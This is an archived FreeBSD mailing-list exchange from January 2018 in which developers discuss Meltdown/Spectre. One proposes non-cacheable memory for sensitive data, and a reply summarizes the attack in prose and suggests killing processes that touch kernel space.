Skip site navigation (1)Skip section navigation (2)
Date:      Sat, 6 Jan 2018 17:07:16 +0100 (CET)
From:      Wojciech Puchar <wojtek@puchar.net>
To:        Eric McCorkle <eric@metricspace.net>
Cc:        "freebsd-hackers@freebsd.org" <freebsd-hackers@FreeBSD.org>, "freebsd-arch@freebsd.org" <freebsd-arch@freebsd.org>
Subject:   Re: Fwd: A more general possible meltdown/spectre countermeasure
Message-ID:  <alpine.BSF.2.20.1801061701200.40627@puchar.net>
In-Reply-To: <33bcd281-4018-7075-1775-4dfcd58e5a48@metricspace.net>
References:  <c98b7ac3-26f0-81ee-2769-432697f876e5@metricspace.net> <33bcd281-4018-7075-1775-4dfcd58e5a48@metricspace.net>

next in thread | previous in thread | raw e-mail | index | archive | help
sorry for stupid question but for my understanding these attacks works as 
below:

1) perform access to byte not allowed virtual address and use next 
instruction to store relative to private space so cache is filled 
depending on value that one shouldn't be able to access.

2) as kernel get trap on access violation it will generate SIGSEGV or 
SIGBUS which is directed by application using signal(2) so it can be ignored.

3) other part of code perform some timing magic and detects this way where 
cache is filled - so byte  value can be guessed properly.


My question is - why simply any access attempts to kernel space cannot 
generate SIGKILL? Of course it would harm program development, but as 
today developers doesn't usually use timesharing machine but have private 
computers, simple sysctl variable would suffice.






On Fri, 5 Jan 2018, Eric McCorkle wrote:

> Re-posting to -hackers and -arch.  I'm going to start working on
> something like this over the weekend.
>
> -------- Forwarded Message --------
> Subject: A more general possible meltdown/spectre countermeasure
> Date: Thu, 4 Jan 2018 23:05:40 -0500
> From: Eric McCorkle <eric@metricspace.net>
> To: freebsd-security@freebsd.org <freebsd-security@freebsd.org>
>
> I've thought more about how to deal with meltdown/spectre, and I have an
> idea I'd like to put forward.  However, I'm still in something of a
> panic mode, so I'm not certain as to its effectiveness.  Needless to
> say, I welcome any feedback on this, and I may be completely off-base.
>
> I'm calling this a "countermeasure" as opposed to a "mitigation", as
> it's something that requires modification of code as opposed to a
> drop-in patch.
>
> == Summary ==
>
> Provide a kernel and userland API by which memory allocation can be done
> with extended attributes.  In userland, this could be accomplished by
> extending MMAP flags, and I could imagine a malloc-with-attributes flag.
> In kernel space, this must already exist, as drivers need to allocate
> memory with various MTRR-type attributes set.
>
> The immediate aim here is to store sensitive information that must
> remain memory-resident in non-cacheable memory locations (or, if more
> effective attribute combinations exist, using those instead).  See the
> rationale for the argument why this should work.
>
> Assuming the rationale holds, then the attack surface should be greatly
> reduced.  Attackers would need to grab sensitive data out of stack
> frames or similar locations if/when it gets copied there for faster use.
> Moreover, if this is done right, it could dovetail nicely into a
> framework for storing and processing sensitive assets in more secure
> hardware[0] (like smart cards, the FPGAs I posted earlier, or other
> options).
>
> The obvious downside is that you take a performance hit storing things
> in non-cacheable locations, especially if you plan on doing heavy
> computation in that memory (say, encryption/decryption).  However, this
> is almost certainly going to be less than the projected 30-50%
> performance hit from other mitigations.  Also, this technique should
> work against spectre as well as meltdown (assuming the rationale holds).
>
> The second downside is that you have to modify code for this to work,
> and you have to be careful not to keep copies of sensitive information
> around too long (this gets tricky in userland, where you might get
> interrupted and switched out).
>
>
> [0]: Full disclosure, enabling open hardware implementations of this
> kind of thing is something of an agenda of mine.
>
> == Rationale ==
>
> (Again, I'm tired, rushed, and somewhat panicked so my logic could be
> faulty at any point, so please point it out if it is)
>
> The rationale for why this should work relies on assumptions about
> out-of-order pipelines that cannot be guaranteed to hold, but are
> extremely likely to be true.
>
> As background, these attacks depend on out-of-order execution performing
> operations that end up affecting cache and branch-prediction state,
> ultimately storing information about sensitive data in these
> side-channels before the fault conditions are detected and acted upon.
> I'll borrow terminology from the paper, using "transient instructions"
> to refer to speculatively executed instructions that will eventually be
> cancelled by a fault.
>
> These attacks depend entirely on transient instructions being able to
> get sensitive information into the processor core and then perform some
> kind of instruction on them before the fault condition cancels them.
> Therefore, anything that prevents them from doing this *should* counter
> the attack.  If the actual sensitive data never makes it to the core
> before the fault is detected, the dependent memory accesses/branches
> never get executed and the data never makes it to the side-channels.
>
> Another assumption here is that CPU architects are going to want to
> squash faulted instructions ASAP and stop issuing along those
> speculative branches, so as to reclaim execution units.  So I'm assuming
> once a fault comes back from address translation, then transient
> execution stops dead.
>
> Now, break down the cases for whether the address containing sensitive
> data is in cache and TLB or not.  (I'm assuming here that caches are
> virtually-indexed, which enables cache lookups to bypass address
> translation.)
>
> * In cache, in TLB: You end up basically racing between the cache and
> TLB, which will very likely end up detecting the fault before the data
> arrives, but at the very worst, you get one or two cycles of transient
> instruction execution before the fault.
>
> * In cache, not in TLB: Virtually-indexed tagged means you get a cache
> lookup racing a page-table walk.  The cache lookup beats the page table
> walk by potentially hundreds (maybe thousands) of cycles, giving you a
> bunch of transient instructions before a fault gets triggered.  This is
> the main attack case.
>
> * Not in cache, in TLB: Memory access requires address translation,
> which comes back almost immediately as a fault.
>
> * Not in cache, not in TLB: You have to do a page table walk before you
> can fetch the location, as you have to go out to physical memory (and
> therefore need a physical address).  The page table walk will come back
> with a fault, stopping the attack.
>
> So, unless I'm missing something here, both non-cached cases defeat the
> meltdown attack, as you *cannot* get the data unless you do address
> translation first (and therefore detect faults).
>
> As for why this defeats the spectre attack, the logic is similar: you've
> jumped into someone else's executable code, hoping to scoop up enough
> information into your branch predictor before the fault kicks you out.
> However, to capture anything about sensitive information in your
> side-channels, the transient instructions need to actually get it into
> the core before a fault gets detected.  The same case analysis as above
> applies, so you never actually get the sensitive info into the core
> before a fault comes back and you get squashed.
>
>
> [1]: A physically-indexed cache would be largely immune to this attack,
> as you'd have to do address translation before doing a cache lookup.
>
>
> I have some ideas that can build on this, but I'd like to get some
> feedback first.
> _______________________________________________
> freebsd-security@freebsd.org mailing list
> https://lists.freebsd.org/mailman/listinfo/freebsd-security
> To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"
> _______________________________________________
> freebsd-hackers@freebsd.org mailing list
> https://lists.freebsd.org/mailman/listinfo/freebsd-hackers
> To unsubscribe, send any mail to "freebsd-hackers-unsubscribe@freebsd.org"
>
>



Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?alpine.BSF.2.20.1801061701200.40627>